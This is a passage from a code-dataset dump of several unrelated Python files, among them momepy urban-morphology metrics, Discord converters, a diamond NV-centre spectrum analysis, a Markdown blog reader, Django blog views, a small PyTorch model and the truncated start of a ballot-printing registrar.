copy; keep the result\n\n orientations = []\n for idx, r in neighbors.iterrows():\n orientations.append(r.tmporient)\n\n deviations = []\n for o in orientations:\n dev = abs(o - row.tmporient)\n deviations.append(dev)\n\n if deviations:\n results_list.append(np.mean(deviations))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n objects.drop(['tmporient'], axis=1, inplace=True)\n print('Street alignments calculated.')\n return series\n\n\ndef building_adjacency(objects, tessellation, spatial_weights=None, spatial_weights_higher=None, order=3, unique_id='uID'):\n \"\"\"\n Calculate the level of building adjacency\n\n Building adjacency reflects how 
much buildings tend to join together into larger structures.\n It is calculated as a ratio of joined built-up structures and buildings within k topological steps.\n\n .. math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights and spatial_weights_higher.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix and spatial_weights_higher.\n If spatial_weights or spatial_weights_higher is None, tessellation is used to calulate it.\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n spatial_weights_higher : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity of higher order will be calculated\n based on tessellation\n order : int\n Order of Queen contiguity\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Vanderhaegen S and Canters F (2017) Mapping urban form and function at city\n block level using spatial metrics. Landscape and Urban Planning 167: 399–409.\n\n Examples\n --------\n >>> buildings_df['adjacency'] = momepy.building_adjacency(buildings_df, tessellation_df, unique_id='uID')\n Calculating adjacency...\n Calculating spatial weights...\n Spatial weights ready...\n Generating weights matrix (Queen) of 3 topological steps...\n Generating dictionary of built-up patches...\n 100%|██████████| 144/144 [00:00<00:00, 9301.73it/s]\n Calculating adjacency within k steps...\n 100%|██████████| 144/144 [00:00<00:00, 335.55it/s]\n Adjacency calculated.\n >>> buildings_df['adjacency'][10]\n 0.23809523809523808\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating adjacency...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n # if weights matrix is not passed, generate it from objects\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(objects, silence_warnings=True)\n print('Spatial weights ready...')\n\n if spatial_weights_higher is None:\n print('Generating weights matrix (Queen) of {} topological steps...'.format(order))\n from momepy import Queen_higher\n # matrix to define area of analysis (more steps)\n spatial_weights_higher = Queen_higher(k=order, geodataframe=tessellation)\n\n print('Generating dictionary of built-up patches...')\n # dict to store nr of courtyards for each uID\n patches = {}\n jID = 1\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n # if the id is already present in courtyards, continue (avoid repetition)\n if index in patches:\n continue\n else:\n to_join = [index] # list of indices which should be joined together\n neighbours = [] # list of neighbours\n weights = spatial_weights.neighbors[index] # neighbours from spatial weights\n for w in weights:\n neighbours.append(w) # make a list from weigths\n\n for n in neighbours:\n while n not in to_join: # until there is some neighbour which is not in to_join\n to_join.append(n)\n weights = spatial_weights.neighbors[n]\n for w in weights:\n neighbours.append(w) # extend neighbours by neighbours of neighbours :)\n for b in to_join:\n patches[b] = jID # fill dict with values\n jID = jID + 
1\n\n print('Calculating adjacency within k steps...')\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights_higher.neighbors[uid]\n\n neighbours_ids = tessellation.iloc[neighbours][unique_id]\n neighbours_ids = neighbours_ids.append(pd.Series(row[unique_id], index=[index]))\n building_neighbours = objects.loc[objects[unique_id].isin(neighbours_ids)]\n indices = list(building_neighbours.index)\n patches_sub = [patches[x] for x in indices]\n patches_nr = len(set(patches_sub))\n\n results_list.append(patches_nr / len(building_neighbours))\n\n series = pd.Series(results_list)\n\n print('Adjacency calculated.')\n return series\n\n\ndef neighbours(objects, spatial_weights=None, weighted=False):\n \"\"\"\n Calculate the number of topological neighbours of each object.\n\n Topological neighbours are defined by queen adjacency. If weighted=True, number of neighbours\n will be divided by the perimeter of object, to return relative value.\n\n .. math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n spatial_weights : libpysal.weights (default None)\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n weighted : bool (default False)\n if weighted=True, number of neighbours will be divided by the perimeter of object, to return relative value\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Hermosilla T, Ruiz LA, Recio JA, et al. (2012) Assessing contextual descriptive features\n for plot-based classification of urban areas. Landscape and Urban Planning, Elsevier B.V.\n 106(1): 124–137.\n\n Examples\n --------\n >>> tessellation_df['neighbours'] = momepy.neighbours(tessellation_df)\n Calculating spatial weights...\n Spatial weights ready...\n Calculating neighbours...\n 100%|██████████| 144/144 [00:00<00:00, 6909.50it/s]\n Neighbours calculated.\n >>> tessellation_df['neighbours'][0]\n 4\n \"\"\"\n\n if not all(objects.index == range(len(objects))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n # if weights matrix is not passed, generate it from objects\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(objects, silence_warnings=True)\n print('Spatial weights ready...')\n\n print('Calculating neighbours...')\n neighbours = []\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n if weighted is True:\n neighbours.append(spatial_weights.cardinalities[index] / row.geometry.length)\n else:\n neighbours.append(spatial_weights.cardinalities[index])\n\n series = pd.Series(neighbours)\n print('Neighbours calculated.')\n return series\n\n\ndef node_degree(graph, name='degree'):\n \"\"\"\n Calculates node degree for each node.\n\n Wrapper around `networkx.degree()`\n\n .. 
math::\n\n\n    Parameters\n    ----------\n    graph : networkx.Graph\n        Graph representing street network.\n        Ideally generated from GeoDataFrame using :py:func:`momepy.gdf_to_nx`\n    name : str, optional\n        calculated attribute name\n\n    Returns\n    -------\n    Graph\n        networkx.Graph\n\n    References\n    ----------\n\n    Examples\n    --------\n\n    \"\"\"\n    netx = graph\n\n    degree = dict(nx.degree(netx))\n    nx.set_node_attributes(netx, degree, name)\n\n    return netx\n","sub_path":"momepy/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":34528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
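The adjacency value returned by `building_adjacency` is the number of distinct built-up patches divided by the number of buildings found within k topological steps. A minimal pure-Python sketch of that final ratio, using hypothetical toy data in place of real spatial weights:

```python
# Hypothetical toy data: each building index maps to the ID of the joined
# built-up patch it belongs to (the `patches` dict built by the loop above).
patches = {0: 1, 1: 1, 2: 1, 3: 2, 4: 3}

# Assume buildings 0-4 form the neighbourhood within k topological steps.
neighbourhood = [0, 1, 2, 3, 4]

unique_patches = len({patches[b] for b in neighbourhood})
adjacency = unique_patches / len(neighbourhood)
print(adjacency)  # 3 patches / 5 buildings = 0.6; lower values = more joined buildings
```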
+{"seq_id":"460959053","text":"from discord.ext import commands\nimport config\n\nrole_converter = commands.RoleConverter()\n\n\nclass CustomRoleConverter(commands.Converter):\n async def convert(self, context, argument):\n\n role_words = argument.lower().lstrip('@').split(' ')\n parsed_role_words = []\n for word in role_words:\n if word in ['gms', 'kms', 'gmsm', 'thms', 'kmsm', 'gms2', 'kms2', 'il', 'fp']:\n parsed_role_words.append(word.upper())\n else:\n parsed_role_words.append(word.capitalize())\n\n parsed_role_name = ' '.join(parsed_role_words)\n try:\n role = await role_converter.convert(context, parsed_role_name)\n if role.name not in config.AUTOASIGN_ROLES:\n raise commands.BadArgument(\n f'{role.mention} is not auto-assignable. '\n f'Please use `!list` to see a full list of assignable roles.')\n return role\n except commands.BadArgument:\n raise commands.BadArgument(f'`{parsed_role_name}` role not found.')\n\n\nclass GameCodeConverter(commands.Converter):\n code_to_game = {\n 'hi3': 'Honkai Impact 3rd'\n }\n\n async def convert(self, context, argument):\n _argument = argument.lower()\n if _argument in self.code_to_game:\n return self.code_to_game[_argument]\n else:\n iter_ = [f\"{key:<5} : {value}\\n\" for key, value in self.code_to_game.items()]\n raise commands.BadArgument(\n f'`{argument}` is not a valid game code. Allowed game codes:'\n f'```\\n'\n f'{\"\".join(iter_)}'\n f'```')\n","sub_path":"francis/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105221907","text":"### My name is Shanying! I wrote this piece'o shit! Today's date is 04/11/2013\n### This is now the new version where I make shit awesome!!\n### Test pushing.\n\nimport pylab as py\nimport winspec\nfrom numpy import ndarray\n\nclass Spectrum:\n \"\"\"\n This class loads a .SPE file or .txt file\n for .txt file (saved from Clarke's Raman), \n first column is wavelength and 2nd column is luminescence\n \"\"\"\n\n @classmethod\n def fromFile(cls,fname):\n return cls(fname = fname)\n \n def __init__(self,**kwargs):\n self._fname = ''\n self._wavelen = []\n self._lum = []\n \n if 'fname' in kwargs:\n\n self._fname = kwargs['fname']\n self._wavelen = py.loadtxt(self._fname)[:,0]\n self._lum = py.loadtxt(self._fname)[:,1]\n \n assert len(self._wavelen) == len(self._lum), \"Wavelength and luminescence length should match\"\n \n else:\n assert type(kwargs['wavelen']) in [ndarray, list], \"first input must be list or ndarray\"\n assert type(kwargs['lum']) in [ndarray, list], \"second input must be list or ndarray\"\n \n self._wavelen = kwargs['wavelen']\n self._lum = kwargs['lum'] \n \n if self._wavelen[0] > self._wavelen[-1]:\n self._wavelen = self._wavelen[::-1]\n self._lum = self._lum[::-1]\n \n def get_wavelen(self):\n return self._wavelen\n \n def get_lum(self):\n return self._lum\n \n def get_lumAtWavelen(self, wavelen):\n lum = None\n index = py.where(self._wavelen > wavelen)[0][0]\n lum = self._lum[index]\n \n assert lum != None, \"wavelength out of bound\"\n return lum\n \n def int_peak(self,fitrange=None, intrange=None, normalize=False, plot=False, npoints=10):\n \"\"\"\n Fits a linear background, subtracts the background, and integrates. Intended to be used for integrating peaks.\n \n wavelen : list\n list of wavelengths in nm. Can be sorted from low to high or high to low\n lum : list\n list of luminescence\n fitrange : 2-element list, optional\n Defaults to the span of the data. Input: [low nm, high nm]\n intrange : 2-element list, optional\n Defaults to the span of the data or fitrange (if given). Input: [low nm, high nm]\n normalize : boolean, optional\n Default is False\n plot : boolean, optional\n Default is False. Plots the original data, the linear background, and the data with the background subtracted\n npoints : int\n Default is 10. 
Number of points above and below the given fitrange point to average over.\n \"\"\"\n if fitrange is None:\n fitindex=[0+npoints/2, len(self._wavelen)-1-npoints/2]\n else:\n fitindex=[0, 0]\n fitindex[0]=py.where(self._wavelen>fitrange[0])[0][0]\n fitindex[1]=py.where(self._wavelen>fitrange[1])[0][0]\n \n wavelenfit=py.concatenate((self._wavelen[fitindex[0]-npoints/2:fitindex[0]+npoints/2], \n self._wavelen[fitindex[1]-npoints/2:fitindex[1]+npoints/2]))\n lumfit=py.concatenate((self._lum[fitindex[0]-npoints/2:fitindex[0]+npoints/2], \n self._lum[fitindex[1]-npoints/2:fitindex[1]+npoints/2]))\n linearfit = py.polyfit(wavelenfit, lumfit, 1)\n linear_bg = py.polyval( linearfit, self._wavelen[fitindex[0]:fitindex[1]+1] )\n wavelen_bg = self._wavelen[fitindex[0]:fitindex[1]+1].copy()\n lum_bg = self._lum[fitindex[0]:fitindex[1]+1].copy()\n lum_bg -= linear_bg\n \n if plot is True:\n py.plot(self._wavelen,self._lum,'k')\n py.plot(wavelen_bg,linear_bg,'k:')\n py.plot(wavelen_bg,lum_bg,'r')\n py.show()\n \n intindex=[0,0]\n if intrange is None:\n wavelen_int = wavelen_bg\n lum_int = lum_bg \n else:\n intindex[0]=py.where(wavelen_bg>intrange[0])[0][0]\n intindex[1]=py.where(wavelen_bg>intrange[1])[0][0] \n wavelen_int = wavelen_bg[intindex[0]:intindex[1]+1]\n lum_int = lum_bg[intindex[0]:intindex[1]+1]\n \n peak_area = py.trapz(lum_int, x=wavelen_int)\n return peak_area\n \n def get_NVratio(self, NV0fitrange = [567, 581], NV0intrange = [573.5, 581], NVmfitrange = [633, 644],plot=False):\n \"\"\"\n Returns a list of NV0 ZPL area, NVm ZPl area, and NVm/(NV0+NVm) ratio.\n \n NV0fitrange: list, optional\n Default [567, 581] (nm)\n NV0intrange: list, optional\n Default [573.5, 581] (nm)\n NVmfitrange: list, optional\n Default [633, 644] (nm)\n plot: boolean, optional\n Default False\n \"\"\"\n NV0=self.int_peak(fitrange=NV0fitrange, intrange=NV0intrange, plot=plot)\n NVm=self.int_peak(fitrange=NVmfitrange,plot=plot)\n \n return [NV0,NVm,NVm/(NV0+NVm)]\n \n def plot(self,*args,**kwargs):\n py.plot(self._wavelen, self._lum,*args,**kwargs)\n \n# def load_520exc(files,NV0fitrange=[573,586], NVmfitrange=[636,648]):\n# \"\"\"\n# files: list\n# \"\"\"\n# data=[winspec.Spectrum(f) for f in files]\n# \n# NV=py.zeros((py.size(data),3))\n# NV[:,0]=[int_peak(d.wavelen, d.lum, fitrange=NV0fitrange) for d in data]\n# NV[:,1]=[int_peak(d.wavelen, d.lum,fitrange=NVmfitrange) for d in data]\n# NV[:,2]=NV[:,1]/(NV[:,0]+NV[:,1])\n# \n# return NV\n#\n# def load_highgrating(files,NV0fitrange=[568,580],NV0intrange=[574,580],NVmfitrange=None):\n# \"\"\"\n# files: list\n# format: str\n# \"\"\"\n# dataNV0=[]\n# dataNVm=[]\n# for f in files:\n# if f.find('NV0') is not -1:\n# dataNV0.append(winspec.Spectrum(f))\n# elif f.find('NVm') is not -1:\n# dataNVm.append(winspec.Spectrum(f))\n# else:\n# raise ValueError(f,'filename must contain either \"NV0\" or \"NVm\"')\n# \n# data=py.vstack([dataNV0,dataNVm])\n# NV=py.zeros((py.size(dataNV0),3))\n# \n# NV[:,0]=[int_peak(d.wavelen, d.lum, fitrange=NV0fitrange,intrange=NV0intrange) for d in dataNV0]\n# NV[:,1]=[int_peak(d.wavelen, d.lum,fitrange=NVmfitrange) for d in dataNVm]\n# NV[:,2]=NV[:,1]/(NV[:,0]+NV[:,1])\n# \n# return NV\n \n\nclass Map:\n def __init__(self,fname):\n \"\"\"\n initializes Map object, and loads a z scan or x, y, z map. 
\n \"\"\"\n self._specList=[]\n self._focusedSpec = []\n self._z=[]\n self._nfocus=0\n self._fname = fname\n self._wavelen = py.loadtxt(self._fname)[0]\n \n isReversed = self._wavelen[0] > self._wavelen[-1]\n if isReversed:\n self._wavelen = self._wavelen[::-1]\n \n data = py.loadtxt(self._fname,skiprows=1)\n \n # check what kind of a file it is\n lendiff = py.shape(data)[1] - len(self._wavelen)\n if lendiff == 1:\n self.load_focus(data, isReversed)\n if lendiff == 3:\n self.load_map(data, isReversed)\n \n def get_wavelen(self):\n return self._wavelen\n \n def get_specList(self):\n return self._specList\n \n def get_focusedSpec(self):\n return self._focusedSpec\n \n def get_zvals(self):\n return self._z\n \n def load_focus(self, data, isReversed):\n \"\"\"\n return list of Spectrum \n \"\"\"\n self._z=data[:,0]\n self._nfocus=len(data[:,0])\n \n spectrums = []\n for focus in data:\n lum = focus[1:][::-1] if isReversed else focus[1:]\n spectrums.append(Spectrum(wavelen=self._wavelen,lum=lum))\n \n self._specList = [spectrums] # only one point\n \n assert len(self._specList[0]) == self._nfocus, \"Num focus points must equal num of luminescence\"\n \n def load_map(self, data, isReversed):\n \n # sort\n data=list(data)\n data.sort( key=lambda x: x[1])\n data.sort( key=lambda x: x[2])\n data=py.asarray(data)\n \n # find nfocus\n firstfocus=data[0][0]\n for row in data[1:]:\n self._nfocus+=1\n if row[0] == firstfocus:\n break\n \n # extract lum data \n for row in data:\n if isReversed:\n lum = row[3:][::-1]\n else:\n lum = row[3:]\n self._specList.append(Spectrum(wavelen=self._wavelen,lum=lum))\n\n # split specList into points, ie. [[z1, z1, z3],[z1,z2,z3]]\n self._specList=[self._specList[i:i+self._nfocus] for i in range(0,len(self._specList),self._nfocus)]\n self._z = (data[:,0][0:self._nfocus])\n \n assert len(self._z) == len(self._specList[0]), \"len of focuses must match specList sublist length\" \n\n def find_focus(self, wavelen,plot=False):\n \"\"\"\n for each point, finds the focus of highest intensity at given wavelength\n saves the Spectrum with \"best focus\" in a new list called self._focusedSpec\n \n returns z values of the best focus at each point\n \n wavelen: int or float\n Finds focus with max luminescence at this wavelength (nm) \n \"\"\"\n lum = []\n bestz=[]\n for point in self._specList:\n a=[]\n if plot == True:\n py.figure()\n for spec in point:\n lum.append(spec.get_lumAtWavelen(wavelen))\n if plot == True:\n spec.plot()\n if plot == True:\n for z in self._z:\n a.append(str(z))\n py.legend(a)\n maxlum_index = lum.index(max(lum))\n self._focusedSpec.append(point[maxlum_index])\n bestz.append(self._z[maxlum_index])\n lum = []\n \n #print bestz\n return bestz\n \n def define_focus(self,zindexlist):\n \"\"\"\n zindexlist: list\n List of indexes for the desired focus\n \"\"\"\n assert len(zindexlist) == len(self._specList), 'length of zindexlist must match number of points'\n self._focusedSpec=[]\n for point, index in zip(self._specList,zindexlist):\n self._focusedSpec.append(point[index])\n \n def get_NVratio(self,maxwavelen=638,*args,**kwargs):\n \"\"\"\n Finds best focus at given wavelength for each point, \n \n maxwavelen: int or float, optional\n Default is 638nm, maximizing to NVm ZPL\n \"\"\"\n NVvalues=[]\n if self._focusedSpec==[]:\n indexList = self.find_focus(maxwavelen)\n \n for point in self._focusedSpec:\n NVvalues.append(point.get_NVratio(*args,**kwargs))\n \n NVvalues = py.asarray(NVvalues)\n \n return NVvalues\n\n def plot_points(self, *args, **kwargs):\n 
\"\"\" \n Plots focused points\n to plot legend, use showlegend = True keyword argument\n \"\"\"\n assert len(self._focusedSpec) != 0, \"haven't found focus yet\"\n \n for i in range(len(self._focusedSpec)):\n if i > 6:\n fmt = '--'\n else:\n fmt = '-'\n self._focusedSpec[i].plot(label=str(i),linestyle=fmt,*args, **kwargs)\n py.legend()\n \n def remove_point(self,pointindex):\n \"\"\"\n Removes crappy points as necessary, inputting an index or a list of index\n \"\"\"\n assert self._focusedSpec !=[], 'FocusedSpec list must have values'\n # need to insert some way of making sure the list of pointindexes are sorted from lowest to highest\n if type(pointindex) is list:\n for point in pointindex[::-1]:\n del self._focusedSpec[point]\n elif type(pointindex) is int:\n del self._focusedSpec[pointindex]\n else: \n raise 'pointindex must be either list or int'","sub_path":"NVanalysis.py","file_name":"NVanalysis.py","file_ext":"py","file_size_in_byte":12179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"319834506","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nBlog content file parser.\n\nSyntax::\n\n -----------------\n title: Title\n date: 2011-09-01\n folder: life\n tags: tag1, tag2\n -----------------\n\n Your content here. And it support code highlight.\n\n ```python\n\n def hello():\n return 'Hello World'\n\n ```\n\n\n:copyright: (c) 2011 by Hsiaoming Young (aka lepture)\n:license: BSD\n'''\n\n\nimport re\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.lexers import get_lexer_by_name, TextLexer\nfrom markdown import Markdown\n\nfrom liquidluck.readers import Reader\nfrom liquidluck.namespace import ns, NameSpace\nfrom liquidluck.utils import to_unicode, import_module\nfrom liquidluck import logger\n\nif ns.site.syntax == 'class':\n INLINESTYLES = False\nelse:\n INLINESTYLES = True\n\n\"\"\"\n```python\ndef yourcode():\n print('here')\n```\n\"\"\"\n\n\ndef codeblock(text):\n pattern = re.compile(r'```(\\w+)(.+?)```', re.S)\n formatter = HtmlFormatter(noclasses=INLINESTYLES)\n\n def repl(m):\n try:\n lexer = get_lexer_by_name(m.group(1))\n except ValueError:\n lexer = TextLexer()\n code = highlight(m.group(2), lexer, formatter)\n #code = code.replace('\\n\\n', '\\n \\n').replace('\\n', '
')\n return '\\n\\n%s
\\n\\n' % code\n return pattern.sub(repl, text)\n\n\nmarkdown_prefork = NameSpace({\n 'codeblock': 'liquidluck.readers.mkd.codeblock',\n 'youku': 'liquidluck.filters.youku',\n 'tudou': 'liquidluck.filters.tudou',\n 'yinyuetai': 'liquidluck.filters.yinyuetai',\n})\n\n\ndef markdown(text):\n if 'markdown_prefork' in ns.sections:\n markdown_prefork.update(ns.sections.markdown_prefork)\n\n for module in markdown_prefork.values():\n if module:\n text = import_module(module)(text)\n md = Markdown(extensions=['extra','toc'])\n return md.convert(text)\n\n\nclass MarkdownParser(object):\n def __init__(self, filepath):\n self.filepath = filepath\n\n def read(self):\n f = open(self.filepath)\n logger.info('read ' + self.filepath)\n content = f.read()\n f.close()\n\n meta_regex = re.compile(\n r\"^\\s*(?:-|=){3,}\\s*\\n((?:.|\\n)+?)\\n\\s*(?:-|=){3,}\\s*\\n*\",\n re.MULTILINE\n )\n match = re.match(meta_regex, content)\n if not match:\n logger.error(\"No metadata in: %s\" % self.filepath)\n return None\n meta = match.group(1)\n meta = re.sub(r'\\r\\n|\\r|\\n', '\\n', meta)\n dct = {}\n k = v = None\n for meta in meta.split('\\n'):\n meta = meta.replace('\\t', ' ')\n if meta.startswith(' ') and k:\n dct[k] = dct[k] + '\\n' + meta.lstrip()\n if ':' in meta and not meta.startswith(' '):\n index = meta.find(':')\n k, v = meta[:index], meta[index + 1:]\n k, v = k.rstrip(), v.lstrip()\n dct[k] = to_unicode(v)\n text = to_unicode(content[match.end():])\n dct['content'] = markdown(text)\n return dct\n\n\nclass MarkdownReader(Reader):\n def support_type(self):\n return 'md', 'mkd', 'markdown'\n\n def parse_post(self):\n if hasattr(self, 'post'):\n return self.post\n parts = MarkdownParser(self.filepath).read()\n\n post = NameSpace(parts)\n tags = post.get('tags', None)\n if tags:\n post.tags = [tag.strip() for tag in tags.split(',')]\n self.post = post\n return post\n","sub_path":"liquidluck/readers/mkd.py","file_name":"mkd.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
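The fenced-block regex in `codeblock()` is easy to test in isolation. This sketch swaps the Pygments highlighting for a placeholder replacement, so the pattern's behaviour is visible without any dependencies:

```python
import re

# Same pattern as codeblock(); re.S lets `.` span the newlines inside the fence.
pattern = re.compile(r'```(\w+)(.+?)```', re.S)

text = "intro\n```python\ndef hello():\n    return 'Hello World'\n```\noutro"
replaced = pattern.sub(lambda m: '[%s block, %d chars]' % (m.group(1), len(m.group(2))), text)
print(replaced)  # intro / [python block, NN chars] / outro
```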
+{"seq_id":"336245624","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Post, Comment, Image, Note, Video, Theme\nfrom django.utils import timezone\nfrom .forms import PostForm, CommentForm, ImageForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom os import path\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/post_list.html',{'posts':posts})\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\treturn render(request, 'blog/post_detail.html', {'post':post})\n@login_required\t\ndef post_new(request):\n\tif request.method == 'POST':\n\t\tform = PostForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author=request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\treturn render(request, 'blog/post_edit.html', {'form':form})\n\t\n\t\n@login_required\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == 'POST':\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author=request.user\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\treturn render(request, 'blog/post_edit.html', {'form':form})\n@login_required\ndef post_remove(request, pk):\n\tpost = get_object_or_404(Post, pk = pk)\n\tpost.delete()\n\treturn redirect('post_list')\n\ndef add_comment_to_post(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == 'POST':\n\t\tform = CommentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcomment = form.save(commit=False)\n\t\t\tcomment.post = post\n\t\t\tcomment.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = CommentForm()\n\treturn render(request,'blog/add_comment_to_post.html', {'form':form})\n\n@login_required\ndef comment_approve(request, pk):\n\tcomment = get_object_or_404(Comment, pk=pk)\n\tcomment.approve()\n\treturn redirect('post_detail',pk=comment.post.pk)\n\t\n@login_required\ndef comment_remove(request,pk):\n\tcomment = get_object_or_404(Comment, pk=pk)\n\tpost_pk = comment.post.pk\n\tcomment.delete()\n\treturn redirect('post_detail', pk=post_pk)\n\t# Create your views here.\n\ndef image_view(request): \n\timages = Image.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/image_gallery.html', {'images':images})\n\n@login_required\ndef image_new(request):\n\tif request.method == 'POST':\n\t\tform = ImageForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\timage = form.save(commit=False)\n\t\t\timage.user = request.user\n\t\t\timage.folder_upload = path.join('blog',image.user.username,'images')\n\t\t\timage.published_date = timezone.now()\n\t\t\timage.save()\n\t\t\treturn redirect('image_view')\n\t\t\t\n\telse:\n\t\tform = ImageForm()\n\treturn render(request, 'blog/image_edit.html', {'form':form})\n\n\ndef video_view(request):\n\tvideos = Video.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/video_gallery.html', {'videos':videos})\n\t\ndef category(request,slug):\n\tcategory = 
Theme.objects.get(slug=slug)\n\tpost = Post.objects.filter(category=category)\n\tpaginator = Paginator(post, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpost = paginator.page(page)\n\texcept EmptyPage:\n\t\tpost = paginator.page(paginator.num_pages)\n\texcept PageNotAnInteger:\n\t\tpost = paginator.page(1)\n\treturn render(request, 'category_list.html', {\n\t'category':category, 'page':page, 'post':post})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
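The `category` view's two `except` clauses implement a common pagination fallback: a non-integer page falls back to page 1, an out-of-range page to the last page. A framework-free sketch of that policy:

```python
# Mirrors the view above: PageNotAnInteger -> page 1, EmptyPage -> last page.
def resolve_page(page, num_pages):
    try:
        page = int(page)
    except (TypeError, ValueError):   # Django would raise PageNotAnInteger
        return 1
    if not 1 <= page <= num_pages:    # Django would raise EmptyPage
        return num_pages
    return page

print(resolve_page('abc', 7), resolve_page(99, 7), resolve_page(3, 7))  # 1 7 3
```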
+{"seq_id":"112301803","text":"import torch\nimport torch.nn as nn\nfrom ipdb import set_trace as pdb\n\n\nclass simpleNet(nn.Module):\n def __init__(self, hidden_size):\n super(simpleNet, self).__init__()\n\n self.in1 = nn.Linear(11, hidden_size)\n self.out1 = nn.Linear(hidden_size, 3)\n\n self.in2 = nn.Linear(14, hidden_size)\n self.out2 = nn.Linear(hidden_size, 2)\n\n self.dropout = nn.Dropout(p=0.1)\n self.BN = nn.BatchNorm1d(hidden_size)\n\n def forward(self, x):\n missing = torch.relu(self.in1(x))\n # missing = self.dropout(missing)\n missing = self.out1(missing)\n y = torch.cat((x, missing), dim=1)\n\n y = torch.relu(self.in2(y))\n y = self.BN(y)\n # y = self.dropout(y)\n y = self.out2(y)\n y = torch.sigmoid(y)\n return missing, y\n\n def freeze_stage1_param(self):\n for param in self.in1.parameters():\n param.requires_grad = False\n for param in self.out1.parameters():\n param.requires_grad = False\n","sub_path":"task2/src/baseline2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"641754615","text":"\"\"\"Registrador del modulo sufragio.\n\nSe encarga de manejar el almacenamiento e impresion de las BUE.\n\"\"\"\nfrom gi.repository.GObject import timeout_add\n\n\nclass Registrador(object):\n\n \"\"\"La clase que maneja el registro en la boleta.\n Por \"registrar\" entendemos imprimir + guardar el chip.\n \"\"\"\n\n def __init__(self, callback, modulo, callback_error):\n \"\"\"Constructor del registrador de boletas.\"\"\"\n self.callback = callback\n self.modulo = modulo\n self.callback_error = callback_error\n\n self._evento_ya_lanzado = False\n self.seleccion = None\n\n def _registrar_voto(self, solo_impimir=False):\n \"\"\"La funcion que explicitamente manda a registrar el voto.\"\"\"\n logger = self.modulo.sesion.logger\n logger.info(\"Registrando voto.\")\n fallo = False\n impresora = self.modulo.sesion.impresora\n\n def fin_de_la_impresion(estado=None):\n \"\"\"Callback que se llama cuando se terminó de imprimir una BUE.\"\"\"\n logger.info(\"Terminó de imprimir.\")\n if not self._evento_ya_lanzado:\n logger.info(\"Rehookeando eventos.\")\n self._evento_ya_lanzado = True\n impresora.remover_insertando_papel()\n rampa = self.modulo.rampa\n rampa.tiene_papel = False\n impresora.registrar_insertando_papel(rampa.cambio_sensor_2)\n if not fallo:\n logger.info(\"Llamando al callback post impresión.\")\n self.callback()\n return False\n\n self._evento_ya_lanzado = False\n # hookeo el evento, pero tambien agrego un timeout para asegurarme de\n # que si por alguna razón no salta el evento de fin de impresión sigue\n # su curso y asume que la sesion de impresión terminó. El manejo del\n # error de esto se hace mas abajo y es syncronico, a diferencia de\n # esto que es asincronico.\n if impresora is not None:\n 